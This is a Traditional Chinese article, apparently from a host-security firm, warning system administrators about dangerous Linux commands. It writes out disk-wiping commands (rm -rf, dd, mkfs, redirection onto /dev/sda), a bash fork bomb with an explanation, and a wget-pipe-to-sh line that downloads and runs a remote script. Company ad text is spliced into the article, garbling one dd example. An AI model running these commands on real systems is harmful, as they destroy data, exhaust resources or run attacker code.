主機的安全運維人員，接觸最多的是linux centos系統較多一些，在linux主機的安全管

理與設置大多數都是命令行的方式來對主機進行操作，為了主機的操作安全，有些常用的命

令，以及必須牢記的命令，對系統造成危害很大的命令，都要謹慎的使用，從主機安全運維的

十年安全維護經驗來著手，列舉一下幾個比較常見的linux主機命令。

 

 

1.  rm -rf 命令

 

rm 命令大家都不會陌生，基本上應該知道是什麼意思，大體的意思是強制刪除指定目錄下的所有

文件和文件夾，經常有主機運維技術在使用這個命令的時候出現誤操作，指定的目錄寫成根目

錄的地址，導致網站文件誤刪除的發生，我記得有一次在使用這個命令的時候，本來以為自己已

經切換到我要刪除的目錄了，然後使用了rm -rf命令，然而實際上我並沒有切換，直接將網站全部

刪除，導致數據無法恢復，真的是血的教訓啊。eSafe白帽資安網公司是一家專注於：主機安全、網站

安全、網站安全檢測、網站漏洞修復,滲透測試,安全服務於一體的網絡安全服務提供商。
 

 

2.  > /dev/sda 命令
 

這個命令的關鍵在於後面的 /dev/sda ，執行完這個操作之後，數據會被寫入第一個硬盤，導致覆

蓋掉所有文件和文件夾。危害可想而知。
 

 

3.  > file 命令
 

這個linux命令的作用是將之前的內容重定向到文件中，而且是覆蓋掉原有文件，所以在執行這個

操作的時候要小心後面的文件，確保文件名正確，否則會因為自己的失誤把重要的文件覆蓋掉，

造成不必要的麻煩。

 

 

4.  wget http://esafe.tw.com/exp.sh -O- | sh
 

這個命令經常被駭客拿來使用，在受害機器上下載並執行駭客指定的腳本，執行反彈 shell 或者

提權啥的操作。作為運維者，小心使用這個命令，防止駭客使用釣魚等技術誘使你執行他讓你執

行的命令，導致系統淪陷。

 

5.  mkfs.ext4 /dev/sda1 命令
 

這個命令的作用是將主機裡的 /dev/sda1目錄 格式化，這個操作造成的危害大家可能都經歷過

在安裝 windows 主機操作系統的時候，一不小心把硬盤系統都格式化的事情，想想都很可怕。
 

 

6.  dd if=/dev/random of=/dev/sda 命令
 

Dd 命令用於複製 & 改變硬盤分區。如果，你用錯地方了，那麼也很危險。比如下面的命令可以

使整個主硬盤清零：dd if=/dev/zero of=/dev/hadeSafe白帽資安網公司是一家專注於：主機安全、

網站安全、網站安全檢測、網站漏洞修復,滲透測試,安全服務於一體的網絡安全服務提供商。
 

 

7.  mv ~ /dev/null 命令
 

/dev/null ，從名稱上可以很顯然看出是一個空文件（寫入到 /dev/null 時全部丟失，讀取 /dev/null

時自己返回 EOF ）。這條命令的意思就是將用戶文件移動到 /dev/null ，也就是變相的刪除文

件，所以使用這個命令的時候也要小心，防止丟失數據。

 

 

8.  :(){:|:&};: 命令
 

以上命令是 Linux 下的 bash fork 炸彈，我們將上面的命令換一下形式如下：

 

: () {

  \: | \: &

}; :

 

以上命令中: 是函數名，執行一個調用自己的遞歸並且回調自己，& 表示後台執行程序，最後的一

個 :是在函數外調用和執行 : () 這個函數的意思。最終的目的就是創建一個每次調用自身調用兩次

的函數，並沒有任何方法來終止自身。 然後它將保持倍增，直到您用完主機的系統資源為止。